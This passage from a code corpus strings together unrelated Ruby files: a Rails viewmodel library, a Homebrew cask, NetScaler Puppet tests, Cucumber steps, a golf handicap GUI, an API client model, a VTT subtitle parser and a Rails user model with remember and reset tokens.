# associated here are join-table models; we need to get the far side out
join_models = associated
if association_data.ordered?
attr = association_data.direct_viewmodel._list_attribute_name
join_models = join_models.sort_by { |j| j[attr] }
end
join_models.map do |through_model|
model = through_model.public_send(association_data.indirect_reflection.name)
association_data.viewmodel_class_for_model!(model.class).new(model)
end
when association_data.collection?
associated_viewmodels = associated.map do |x|
associated_viewmodel_class = association_data.viewmodel_class_for_model!(x.class)
associated_viewmodel_class.new(x)
end
# If any associated type is a list member, they must all be, so sort by list position
if association_data.ordered?
associated_viewmodels.sort_by!(&:_list_attribute)
end
associated_viewmodels
else
associated_viewmodel_class = association_data.viewmodel_class_for_model!(associated.class)
associated_viewmodel_class.new(associated)
end
end
# Rails 6.1 introduced "previously_new_record?", but this library still
# supports activerecord >= 5.0. This is an approximation.
def self.model_previously_new?(model)
if (id_changes = model.saved_change_to_id)
old_id, _new_id = id_changes
return true if old_id.nil?
end
false
end
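# Illustrative example (Widget is a hypothetical model): after `w = Widget.create!`,
# `w.saved_change_to_id` returns `[nil, w.id]`, so `model_previously_new?(w)` is true;
# after a plain `w.update!(...)` the id is unchanged, `saved_change_to_id` is nil,
# and the helper returns false.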
# Helper to return entities that were part of the last deserialization. The
# interface is complex due to the data requirements, and the implementation is
# inefficient.
#
# Intended to be used by replace_associated style methods which may touch very
# large collections that must not be returned fully. Since the collection is
# not being returned, order is also ignored.
def _read_association_touched(association_name, touched_ids:)
association_data = self.class._association_data(association_name)
associated = model.public_send(association_data.direct_reflection.name)
return nil if associated.nil?
case
when association_data.through?
# associated here are join-table models; we need to get the far side out
associated.map do |through_model|
model = through_model.public_send(association_data.indirect_reflection.name)
next unless self.class.model_previously_new?(through_model) || touched_ids.include?(model.id)
association_data.viewmodel_class_for_model!(model.class).new(model)
end.reject(&:nil?)
when association_data.collection?
associated.map do |model|
next unless self.class.model_previously_new?(model) || touched_ids.include?(model.id)
association_data.viewmodel_class_for_model!(model.class).new(model)
end.reject(&:nil?)
else
# singleton always touched by definition
model = associated
association_data.viewmodel_class_for_model!(model.class).new(model)
end
end
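# Illustrative usage sketch (hypothetical association name): after a bulk update
# that touched child ids 1 and 2, only those children (plus any join rows created
# in the same save) are returned, and ordering is deliberately ignored:
#
#   parent_view._read_association_touched(:comments, touched_ids: Set[1, 2])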
def _serialize_association(association_name, json, serialize_context:)
associated = self.public_send(association_name)
association_data = self.class._association_data(association_name)
json.set! association_name do
case
when associated.nil?
json.null!
when association_data.referenced?
if association_data.collection?
json.array!(associated) do |target|
self.class.serialize_as_reference(target, json, serialize_context: serialize_context)
end
else
self.class.serialize_as_reference(associated, json, serialize_context: serialize_context)
end
else
self.class.serialize(associated, json, serialize_context: serialize_context)
end
end
end
def context_for_child(member_name, context:)
# Synthetic viewmodels don't exist as far as the traversal context is
# concerned: pass through the child context received from the parent
return context if self.class.synthetic
# associations to roots start a new tree
member_data = self.class._members[member_name.to_s]
if member_data.association? && member_data.referenced?
return context.for_references
end
super
end
self.abstract_class = true
end
| 35.228889 | 123 | 0.704472 |
213ea8ccd22188362d11a93e3f69880349de9e35 | 1,131 | cask 'unity-vuforia-ar-support-for-editor@2018.1.0b6' do
version '2018.1.0b6,2c4679632cfb'
sha256 :no_check
url "http://beta.unity3d.com/download/2c4679632cfb/MacEditorTargetInstaller/UnitySetup-Vuforia-AR-Support-for-Editor-2018.1.0b6.pkg"
name 'Vuforia Augmented Reality Support'
homepage 'https://unity3d.com/unity/'
pkg 'UnitySetup-Vuforia-AR-Support-for-Editor-2018.1.0b6.pkg'
depends_on cask: 'unity@2018.1.0b6'
preflight do
if File.exist? "/Applications/Unity"
FileUtils.move "/Applications/Unity", "/Applications/Unity.temp"
end
if File.exist? "/Applications/Unity-2018.1.0b6"
FileUtils.move "/Applications/Unity-2018.1.0b6", '/Applications/Unity'
end
end
postflight do
if File.exist? '/Applications/Unity'
FileUtils.move '/Applications/Unity', "/Applications/Unity-2018.1.0b6"
end
if File.exist? '/Applications/Unity.temp'
FileUtils.move '/Applications/Unity.temp', '/Applications/Unity'
end
end
uninstall quit: 'com.unity3d.UnityEditor5.x',
delete: '/Applications/Unity-2018.1.0b6/PlaybackEngines/VuforiaSupport'
end
| 31.416667 | 134 | 0.71618 |
26d0cd8e191fd45911d25bffdc5195976ead7616 | 2,715 | require 'spec_helper_acceptance'
describe 'lbvserver tests' do
it 'makes a lbvserver' do
pp = <<-EOS
netscaler_lbvserver { '1_8_lbvserver1':
ensure => 'present',
service_type => 'DNS',
state => true,
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
run_device(allow_changes: false)
end
it 'makes and edits a lbvserver' do
pp = <<-EOS
netscaler_lbvserver { '1_8_lbvserver2':
ensure => 'present',
service_type => 'HTTP',
ip_address => '1.8.2.1',
port => '8080',
state => true,
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
run_device(allow_changes: false)
pp = <<-EOS
netscaler_lbvserver { '1_8_lbvserver2':
ensure => 'present',
service_type => 'HTTP',
ip_address => '1.8.2.2',
port => '8080',
state => true,
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
run_device(allow_changes: false)
end
it 'makes and deletes a lbvserver' do
pp = <<-EOS
netscaler_lbvserver { '1_8_lbvserver3':
ensure => 'present',
service_type => 'HTTP',
ip_address => '1.8.3.1',
port => '8080',
state => true,
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
run_device(allow_changes: false)
pp = <<-EOS
netscaler_lbvserver { '1_8_lbvserver3':
ensure => 'absent',
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
run_device(allow_changes: false)
end
it 'makes and disables/enables a lbvserver' do
pp = <<-EOS
netscaler_lbvserver { '1_8_lbvserver4':
ensure => 'present',
service_type => 'HTTP',
ip_address => '1.8.4.1',
port => '8080',
state => 'ENABLED',
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
run_device(allow_changes: false)
pp2 = <<-EOS
netscaler_lbvserver { '1_8_lbvserver4':
ensure => 'present',
service_type => 'HTTP',
ip_address => '1.8.4.1',
port => '8080',
state => 'DISABLED',
}
EOS
pp3 = <<-EOS
netscaler_lbvserver { '1_8_lbvserver4':
ensure => 'present',
service_type => 'HTTP',
ip_address => '1.8.4.1',
port => '8080',
state => 'ENABLED',
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
make_site_pp(pp2)
run_device(allow_changes: true)
run_device(allow_changes: false)
make_site_pp(pp3)
run_device(allow_changes: true)
run_device(allow_changes: false)
end
end
| 24.241071 | 48 | 0.561326 |
5d54f065e5005e8750e867c1157f468cb7c88193 | 641 | module Spree
module Admin
class MakesController < ResourceController
#Is this supposed to be a controller for the makes of cars?
def index
respond_with(@collection)
end
private
def collection
return @collection if @collection.present?
# params[:q] can be blank upon pagination
params[:q] = {} if params[:q].blank?
@collection = super
@search = @collection.ransack(params[:q])
@collection = @search.result.
page(params[:page]).
per(Spree::Config[:properties_per_page])
@collection
end
end
end
end
| 22.892857 | 65 | 0.595944 |
26ca919fd3d2e43e53caa33dff91cd4ecce46938 | 6,255 | require_relative "steps_helper"
# Scenario: Registration completed successfully (Happy Path)
Given("Eu sou o Administrador") do
cria_administrador
end
Given("Eu sou Administrador") do
cria_administrador
end
Given("Eu estou logado") do
cria_administrador
fazer_login_Adm
end
When("Eu acesso pagina de criar um novo medico") do
cria_administrador
fazer_login_Adm
visit '/medicos/new'
expect(page).to have_content("Cadastrar Novo Medico");
end
When("Eu acesso pagina de criar um novo medico sem estar logado") do
visit '/medicos/new'
end
When("envio o formulario de medico com dados validos") do
cria_administrador
fazer_login_Adm
visit '/medicos/new'
expect(page).to have_content("Cadastrar Novo Medico");
cria_medico_valido
preencherCamposMedico(@medicovalido)
# find(:xpath, "/html/body/form/div[9]/input").click
find(:xpath, "/html/body/div/div/form/div[9]/input").click
end
Then("na pagina principal recebo a mensagem de Medico cadastrado com sucesso!") do
cria_administrador
fazer_login_Adm
visit '/medicos/new'
cria_medico_valido
preencherCamposMedico(@medicovalido)
# find(:xpath, "/html/body/form/div[9]/input").click
find(:xpath, "/html/body/div/div/form/div[9]/input").click
expect(page).to have_content("Medico was successfully created.")
end
# Scenario: Registration with required fields missing
# Ambiguity with "Eu sou Administrador" above
#Given("Eu sou Administrador") do
# cria_administrador
# fazer_login_Adm
#end
When ("envio o form de novo medico com todos os campos em branco") do
cria_administrador
fazer_login_Adm
visit '/medicos/new'
medico_sem_dado_no_form
# find(:xpath, "/html/body/form/div[9]/input").click
end
Then ("recebo mensagems de erro na pagina de cadastro de medico para os seguintes campos:") do |table|
# table is a Cucumber::MultilineArgument::DataTable
medico_sem_dado_no_form
linhas = table.raw
linhas.each do |linha|
expect(page).to have_content(linha[0])
end
end
# Scenario: Direct access without being logged in
Given("Eu sou um convidado") do
cria_convidado
end
# Considered ambiguous with "Eu nao estou logado" in the user steps
#Given("Eu nao estou logado") do
# cria_convidado
# visit '/users/sign_out'
#end
#Given("Eu acesso pagina de criar um novo medico") do
# cria_convidado
# visit '/users/sign_out'
# visit '/medicos/new'
#end
# Ambiguous with the phrase above
#Then("recebo mensagem de erro na pagina de cadastro de medico") do
# pending # Write code here that turns the phrase above into concrete actions
#end
Then("sou redirecionada para a pagina de login de usuario") do
#cria_convidado
#cria_convidado
#visit '/'
#visit '/usuarios/sign_out"'
#find(:xpath,"/html/body/div[2]/div/div[1]/a[4]").click;
visit '/medicos/new'
expect(page).to have_content("pido - ACESSAR");
expect(page).to have_content("Esqueceu sua senha?");
expect(page).to have_content("Criar sua conta");
end
# Scenario: Edit a doctor with a repeated specialty
When("Eu cadastro uma especialidade") do
cria_administrador
fazer_login_Adm
visit '/especialidades/new'
cria_especialidade_valida
preencherCamposEspecialidade(@especialidadevalida)
# When bootstrap is configured on the page the xpath changes
find(:xpath, "/html/body/form/div[4]/input").click
expect(page).to have_content("Especialidade was successfully created.")
end
When("Eu cadastro um medico com esta especialidade") do
# The steps that create the specialty are repeated here
# because cucumber only lets us control application state "across pages"
# within a single step, not between steps.
# Despite the DRY problem, that operation is already tested in the previous step
# register the specialty
#cria_administrador
#fazer_login_Adm
#visit '/especialidades/new'
#cria_especialidade_valida
#preencherCamposEspecialidade(@especialidadevalida)
# When bootstrap is configured on the page the xpath changes
#find(:xpath, "/html/body/form/div[4]/input").click
# incredibly, it worked across steps... I left the comments here to
# raise that question...
# register a doctor, now with the specialty registered earlier
visit '/medicos/new'
expect(page).to have_content("Cadastrar Novo Medico");
cria_medico_valido
preencherCamposMedicoESelecionaUmaEspecialidade(@medicovalido)
#page.should have_css('#esp_ortopedista[value='1']')
find(:css, "#esp_EspecialidadeBemIncomumPraTeste").set(true)
find(:xpath, "/html/body/div/div/form/div[9]/input").click
expect(page).to have_content("Medico was successfully created.")
expect(page).to have_content("Voltar")
page.should have_css("a[href='/medicos']")
expect(page).to have_content("EspecialidadeBemIncomumPraTeste") #Significa que o medico tem essa especialidade
find(:css, "a[href='/medicos']").click
end
When("Eu clico em voltar para ir ate a pagina que lista medicos") do
visit '/medicos'
expect(page).to have_content("EspecialidadeBemIncomumPraTeste") #Significa que o medico tem essa especialidade
expect(page).to have_content("Medico X2"); # que he o nome do medico que eu cadastrei nos passos anteriore
end
When("Eu clico em editar o medico que eu inseri") do
expect(page).to have_content("Medico X2") # o ultimo medico valido inserido tem esse nome
expect(page).to have_content("EspecialidadeBemIncomumPraTeste") #A o medico tinha sido editado pra ter essa especialidade
#Aqui a gente clica no editar do metido que inserimos
find(:xpath, "/html/body/div/div/table/tbody/tr[4]/td[11]/a").click #fix-me: Deveria haver so um medico listado, tem 4
end
When("Eu seleciono a mesma especialidade existente que o medico ja tem") do
# On the doctor edit page we select the same specialty the doctor already has, to add it again
find(:xpath,"//*[@id='esp_EspecialidadeBemIncomumPraTeste']").click
end
When("Eu clico em atualizar medico") do
# And we click update
find(:xpath,"/html/body/div/div/form/div[9]/input").click
end
Then("Recebo a msg medico atualizado com sucesso mas sem especialidades repetidas") do
expect(page).to have_no_content("EspecialidadeBemIncomumPraTeste EspecialidadeBemIncomumPraTeste")
expect(page).to have_content("Medico was successfully updated.")
end
| 32.409326 | 123 | 0.755556 |
6a269be9c979063984b0b04f7bebe72e81d34cd7 | 12,773 | =begin
#Hydrogen Nucleus API
#The Hydrogen Nucleus API
OpenAPI spec version: 1.9.4
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NucleusApi
# BankLink Object
class BankLink
# accountId
attr_accessor :account_id
# availableBalance
attr_accessor :available_balance
# balance
attr_accessor :balance
# bankAccountHolder
attr_accessor :bank_account_holder
# bankAccountName
attr_accessor :bank_account_name
# bankAccountNumber
attr_accessor :bank_account_number
# businessId
attr_accessor :business_id
# clientId
attr_accessor :client_id
attr_accessor :create_date
# currencyCode
attr_accessor :currency_code
attr_accessor :id
# institutionId
attr_accessor :institution_id
# institutionName
attr_accessor :institution_name
# isActive
attr_accessor :is_active
# isDefault
attr_accessor :is_default
# isLinkVerified
attr_accessor :is_link_verified
# linkVerifiedDate
attr_accessor :link_verified_date
# mask
attr_accessor :mask
attr_accessor :metadata
# routing
attr_accessor :routing
# routingWire
attr_accessor :routing_wire
attr_accessor :secondary_id
# type
attr_accessor :type
attr_accessor :update_date
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'account_id' => :'account_id',
:'available_balance' => :'available_balance',
:'balance' => :'balance',
:'bank_account_holder' => :'bank_account_holder',
:'bank_account_name' => :'bank_account_name',
:'bank_account_number' => :'bank_account_number',
:'business_id' => :'business_id',
:'client_id' => :'client_id',
:'create_date' => :'create_date',
:'currency_code' => :'currency_code',
:'id' => :'id',
:'institution_id' => :'institution_id',
:'institution_name' => :'institution_name',
:'is_active' => :'is_active',
:'is_default' => :'is_default',
:'is_link_verified' => :'is_link_verified',
:'link_verified_date' => :'link_verified_date',
:'mask' => :'mask',
:'metadata' => :'metadata',
:'routing' => :'routing',
:'routing_wire' => :'routing_wire',
:'secondary_id' => :'secondary_id',
:'type' => :'type',
:'update_date' => :'update_date'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'account_id' => :'String',
:'available_balance' => :'Float',
:'balance' => :'Float',
:'bank_account_holder' => :'String',
:'bank_account_name' => :'String',
:'bank_account_number' => :'String',
:'business_id' => :'String',
:'client_id' => :'String',
:'create_date' => :'DateTime',
:'currency_code' => :'String',
:'id' => :'String',
:'institution_id' => :'String',
:'institution_name' => :'String',
:'is_active' => :'BOOLEAN',
:'is_default' => :'BOOLEAN',
:'is_link_verified' => :'BOOLEAN',
:'link_verified_date' => :'Date',
:'mask' => :'String',
:'metadata' => :'Hash<String, String>',
:'routing' => :'String',
:'routing_wire' => :'String',
:'secondary_id' => :'String',
:'type' => :'String',
:'update_date' => :'DateTime'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'account_id')
self.account_id = attributes[:'account_id']
end
if attributes.has_key?(:'available_balance')
self.available_balance = attributes[:'available_balance']
end
if attributes.has_key?(:'balance')
self.balance = attributes[:'balance']
end
if attributes.has_key?(:'bank_account_holder')
self.bank_account_holder = attributes[:'bank_account_holder']
end
if attributes.has_key?(:'bank_account_name')
self.bank_account_name = attributes[:'bank_account_name']
end
if attributes.has_key?(:'bank_account_number')
self.bank_account_number = attributes[:'bank_account_number']
end
if attributes.has_key?(:'business_id')
self.business_id = attributes[:'business_id']
end
if attributes.has_key?(:'client_id')
self.client_id = attributes[:'client_id']
end
if attributes.has_key?(:'create_date')
self.create_date = attributes[:'create_date']
end
if attributes.has_key?(:'currency_code')
self.currency_code = attributes[:'currency_code']
end
if attributes.has_key?(:'id')
self.id = attributes[:'id']
end
if attributes.has_key?(:'institution_id')
self.institution_id = attributes[:'institution_id']
end
if attributes.has_key?(:'institution_name')
self.institution_name = attributes[:'institution_name']
end
if attributes.has_key?(:'is_active')
self.is_active = attributes[:'is_active']
end
if attributes.has_key?(:'is_default')
self.is_default = attributes[:'is_default']
end
if attributes.has_key?(:'is_link_verified')
self.is_link_verified = attributes[:'is_link_verified']
end
if attributes.has_key?(:'link_verified_date')
self.link_verified_date = attributes[:'link_verified_date']
end
if attributes.has_key?(:'mask')
self.mask = attributes[:'mask']
end
if attributes.has_key?(:'metadata')
if (value = attributes[:'metadata']).is_a?(Hash)
self.metadata = value
end
end
if attributes.has_key?(:'routing')
self.routing = attributes[:'routing']
end
if attributes.has_key?(:'routing_wire')
self.routing_wire = attributes[:'routing_wire']
end
if attributes.has_key?(:'secondary_id')
self.secondary_id = attributes[:'secondary_id']
end
if attributes.has_key?(:'type')
self.type = attributes[:'type']
end
if attributes.has_key?(:'update_date')
self.update_date = attributes[:'update_date']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @bank_account_holder.nil?
invalid_properties.push('invalid value for "bank_account_holder", bank_account_holder cannot be nil.')
end
if @bank_account_number.nil?
invalid_properties.push('invalid value for "bank_account_number", bank_account_number cannot be nil.')
end
if @institution_name.nil?
invalid_properties.push('invalid value for "institution_name", institution_name cannot be nil.')
end
if @routing.nil?
invalid_properties.push('invalid value for "routing", routing cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @bank_account_holder.nil?
return false if @bank_account_number.nil?
return false if @institution_name.nil?
return false if @routing.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
account_id == o.account_id &&
available_balance == o.available_balance &&
balance == o.balance &&
bank_account_holder == o.bank_account_holder &&
bank_account_name == o.bank_account_name &&
bank_account_number == o.bank_account_number &&
business_id == o.business_id &&
client_id == o.client_id &&
create_date == o.create_date &&
currency_code == o.currency_code &&
id == o.id &&
institution_id == o.institution_id &&
institution_name == o.institution_name &&
is_active == o.is_active &&
is_default == o.is_default &&
is_link_verified == o.is_link_verified &&
link_verified_date == o.link_verified_date &&
mask == o.mask &&
metadata == o.metadata &&
routing == o.routing &&
routing_wire == o.routing_wire &&
secondary_id == o.secondary_id &&
type == o.type &&
update_date == o.update_date
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[account_id, available_balance, balance, bank_account_holder, bank_account_name, bank_account_number, business_id, client_id, create_date, currency_code, id, institution_id, institution_name, is_active, is_default, is_link_verified, link_verified_date, mask, metadata, routing, routing_wire, secondary_id, type, update_date].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
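# Illustrative usage (hypothetical values; note the symbol keys expected by
# attribute_map):
#
#   link = NucleusApi::BankLink.new.build_from_hash(
#     bank_account_holder: 'Jane Doe',
#     bank_account_number: '000123456789',
#     institution_name:    'First Bank',
#     routing:             '110000000'
#   )
#   link.valid? # => true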
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
(value)
when :Date
(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NucleusApi.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.56713 | 335 | 0.617866 |
bbe8e56f205798b536fee60d7302762105abe478 | 1,156 | require_relative './sub_track.rb'
module SubsParsers
class VttParser
# Parses VTT formatted files and returns
# an array of SubTrack
#
# @param [File]
# @return [Array(SubTrack)]
def get_subs(file)
subs = []
track_line = ''
track_subs = []
file.each_line do |line|
if /^((\d\d:)?\d\d:\d\d\.\d+\s-->\s)/.match?(line)
track_line = line
elsif !track_line.empty? && line.eql?("\n")
subs.push(create_sub_track(track_line, track_subs))
track_line = ''
track_subs = []
elsif !track_line.empty?
track_subs.push(line)
else
track_line = ''
track_subs = []
end
end
if !track_line.empty? && !track_subs.empty?
subs.push(create_sub_track(track_line, track_subs))
end
subs
end
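# Illustrative input (a minimal fragment of the cue format this parser expects;
# hours are optional in the timing line):
#
#   00:01.000 --> 00:04.000
#   Never drink liquid nitrogen.
#
#   00:05.000 --> 00:09.000
#   It will perforate your stomach.
#
# Each timing line opens a track, the following lines become its text, and a
# blank line closes it into a SubTrack.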
def format_name()
"vtt"
end
private
def create_sub_track(track_line, subs)
case track_line.split('-->')
in [start_time, end_time]
SubsParsers::SubTrack.new(start_time.strip(), end_time.strip(), subs.join("").strip())
end
end
end
end | 23.12 | 96 | 0.560554 |
d5c9fb3c7df63a0d2f49e605495b380bde98a023 | 157 | class AddRoleToUsers < ActiveRecord::Migration[5.1]
def change
add_column :users, :role, :integer, null: false, after: :username, default: 0
end
end
| 26.166667 | 81 | 0.719745 |
bb7f7fb65fcf7a377b17a152a6ed2d9b83b40537 | 3,403 | class Handicap
include GladeGUI
def initialize()
@scores = []
end
def before_show()
@view = VR::ListView.new(rnd: String, date: VR::Col::CalendarCol,
course: String, rating_slope: String, score: String, diff: Score,
hcp: String)
@view.col_xalign(diff: 1, hcp: 1, score: 1)
@view.col_sortable(date: true, course: true)
@view.show
golfer_file = File.basename(@vr_yaml_file, ".*")
golfer = golfer_file.split("_").map(&:capitalize).join(' ')
@builder[:name].label = "<big><big><big><big><big>#{golfer}</big></big></big></big></big>"
if File.exists?(golfer_file + ".jpg")
@builder[:image].file = golfer_file + ".jpg"
@builder[:image].visible = true
end
refresh()
end
def refresh()
update_handicaps
@view.model.clear
i = 1
@scores.each do |s|
row = @view.add_row()
row[:rnd] = "#{i}."
i += 1
row[:date] = VR::Col::CalendarCol.new(s.date, :format => "%d %b %Y ", :hide_time=>true, :hide_date => false)
row[:course] = s.course_name
row[:score] = s.score
row[:rating_slope] = "#{s.course_rating.to_s}/#{s.course_slope.to_s}"
row[:diff] = s
row[:hcp] = s.handicap
end
end
def buttonAdd__clicked(*a)
if row = @view.selected_rows.first
course = row[:course]
rating, slope = row[:rating_slope].split("/")
else
course = rating = slope = ""
end
score = Score.new(course, rating, slope)
score.show_glade
if !score.used.nil? and score.score.to_i > 50
@scores << score
@scores.sort! { |x,y| y.date <=> x.date }
refresh()
end
end
def update_handicaps
@scores.each_index do |i|
fill_handicap(@scores[@scores.size-i-1..@scores.size-1])
end
@scores.each {|s| s.used = ""}
fill_handicap(@scores)
@builder[:handicap].label = "<big><big><big><big><big><big><big><big>#{@scores[0].handicap}</big></big></big></big></big></big></big></big>" if @scores[0]
end
def fill_handicap(score_array)
score_ar = score_array.size > 20 ? score_array[0..19] : score_array
count = use_count(score_ar) # number of scores to use for handicap
best_scores = score_ar.sort { |x,y| x.diff <=> y.diff }
best_scores = count > 0 ? best_scores[0..count-1] : []
best_scores.each {|s| s.used = "y"}
tot = best_scores.inject(0) { |sum, s| sum + s.diff }
x = (0.96*tot/count).to_s
score_array[0].handicap = count > 0 ? x[0..x.index(".")+1] : "n/a" if score_array[0]
end
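# Worked example (illustrative numbers): with 20 or more rounds the best 10
# differentials are used; if they sum to 152.0 then 0.96 * 152.0 / 10 = 14.592,
# and trimming after the first decimal place yields a handicap of "14.5".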
def buttonChangeGolfer__clicked(*a)
@view = nil # so it doesn't save contents
VR::save_yaml(self)
@builder[:window1].destroy
load_new_golfer
end
def window1__delete_event(*)
@view = nil
VR::save_yaml(self)
return false #ok to close
end
def use_count(score_ar)
if score_ar.size > 20
return 10
else
return [0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,8,9,10][score_ar.size-1]
end
end
def buttonDelete__clicked(*a)
return unless row = @view.selected_rows.first
if alert("Are you sure you want to delete this score?", button_yes: "Delete", button_no: "Cancel")
@scores.delete(row[:diff])
refresh
end
end
def buttonEditScore__clicked(*a)
return unless row = @view.selected_rows.first
row[:diff].show_glade
@scores.sort! { |x,y| y.date <=> x.date }
refresh
end
end
| 29.336207 | 158 | 0.604761 |
182cfcf4c1e49fced0a9c2928aac8d5e51769e19 | 92 | name 'mapr_tasktracker'
description 'MapR tasktracker'
run_list *%w[
role[mapr]
]
| 13.142857 | 30 | 0.684783 |
f76fbd32ac46616f140cce171abc61ba7a592143 | 471 | log_level :info
log_location STDOUT
node_name 'venkat'
client_key '/home/venkat/chef-cookbooks/.chef/venkat.pem'
validation_client_name 'chef-validator'
validation_key '/home/venkat/chef-cookbooks/chef-validator.pem'
chef_server_url 'https://chef-server.venkat.com:443'
syntax_check_cache_path '/root/chef-repo/.chef/syntax_check_cache'
cookbook_path '/home/venkat/chef-cookbooks/cookbooks'
| 47.1 | 73 | 0.687898 |
8775ad321b5ad2bcb3cc426cb4bcd369701d61f8 | 44 | module Transferwise
VERSION = "0.2.6"
end
| 11 | 19 | 0.704545 |
08f0c7bfab0798e172b8f3b9191f08ba1a21df52 | 521 | Spree::Core::Engine.routes.draw do
namespace :admin do
resources :dhl_shipping_methods do
resources :dhl_shipping_zones, only: [:index, :new, :create]
resources :dhl_surcharges, only: [:index, :new, :create]
end
resources :dhl_shipping_zones, except: [:index, :new, :create] do
resources :dhl_country_zones, only: [:index, :new, :create]
end
resources :dhl_surcharges, except: [:index, :new, :create]
resources :dhl_country_zones, except: [:index, :new, :create]
end
end
| 28.944444 | 69 | 0.679463 |
38845ff2e2ddebdb81c8998455572b02757272ff | 3,026 | class User < ApplicationRecord
include Gravtastic
gravtastic
# Virtual attributes; with has_secure_password the password attribute is generated automatically
# Used together with remember_digest
attr_accessor :remember_token, :activation_token, :reset_token
# A method reference is preferable here (before_action)
before_save :downcase_email
before_create :create_activation_digest
validates :name, presence: true, length: { maximum: 50 }
VALID_EMAIL_REGEX = /\A[\w+\-.]+@[a-z\d\-]+(\.[a-z\d\-]+)*\.[a-z]+\z/i
validates :email, presence: true, length: { maximum: 255 },
format: { with: VALID_EMAIL_REGEX },
uniqueness: { case_sensitive: false }
has_secure_password
# allow_nil: true lets profile updates pass validation when the password is nil
validates :password, presence: true, length: { minimum: 6 }, allow_nil: true
validates :a_word, length: { maximum: 30 }
validates :introduction, length: { maximum: 100 }
# Defining this makes it possible to build fixtures
# Returns the hash digest of the given string
def self.digest(string) # self refers to the User class
cost = ActiveModel::SecurePassword.min_cost ? BCrypt::Engine::MIN_COST :
BCrypt::Engine.cost
BCrypt::Password.create(string, cost: cost)
end
# Returns a random token
def self.new_token # self refers to the User class
# The urlsafe_base64 method from the SecureRandom module (creates a remember token)
SecureRandom.urlsafe_base64
end
# Remembers a user in the database for use in persistent sessions
def remember
# Using self here keeps remember_token from becoming a local variable
# self refers to the current user
self.remember_token = User.new_token
# Update the remember digest (bypassing validations)
# Performed on a user already stored in the database
update_attribute(:remember_digest, User.digest(remember_token))
end
# Generalized version
# Returns true if the given token matches the digest; (remember_token) here is a local variable
def authenticated?(attribute, token)
digest = send("#{attribute}_digest")
# Return false and exit early when the digest is nil (prevents a duplicate login after logout)
return false if digest.nil?
BCrypt::Password.new(digest).is_password?(token)
end
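# Illustrative calls (standard usage for this pattern; controller context assumed):
#
#   user.authenticated?(:remember,   cookies[:remember_token])
#   user.authenticated?(:activation, params[:id])
#   user.authenticated?(:reset,      params[:id])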
# Forgets a user's login information
def forget
update_attribute(:remember_digest, nil)
end
# Activates an account
def activate
# update_columns collapses the two update_attribute calls into one line
update_columns(activated: true, activated_at: Time.zone.now)
end
# Sends the activation email
def send_activation_email
UserMailer.account_activation(self).deliver_now
end
# Sets the password reset attributes
def create_reset_digest
self.reset_token = User.new_token
# The update_columns method could combine these into a single line
update_attribute(:reset_digest, User.digest(reset_token))
update_attribute(:reset_at, Time.zone.now)
end
# Sends the password reset email
def password_reset_email
UserMailer.password_reset(self).deliver_now
end
# Returns true if the password reset has expired
def password_reset_expired?
reset_at < 2.hours.ago
end
# Things that do not need to be exposed publicly go below
private
# Converts the email address to all lowercase
def downcase_email
# self refers to the current user
self.email = email.downcase
end
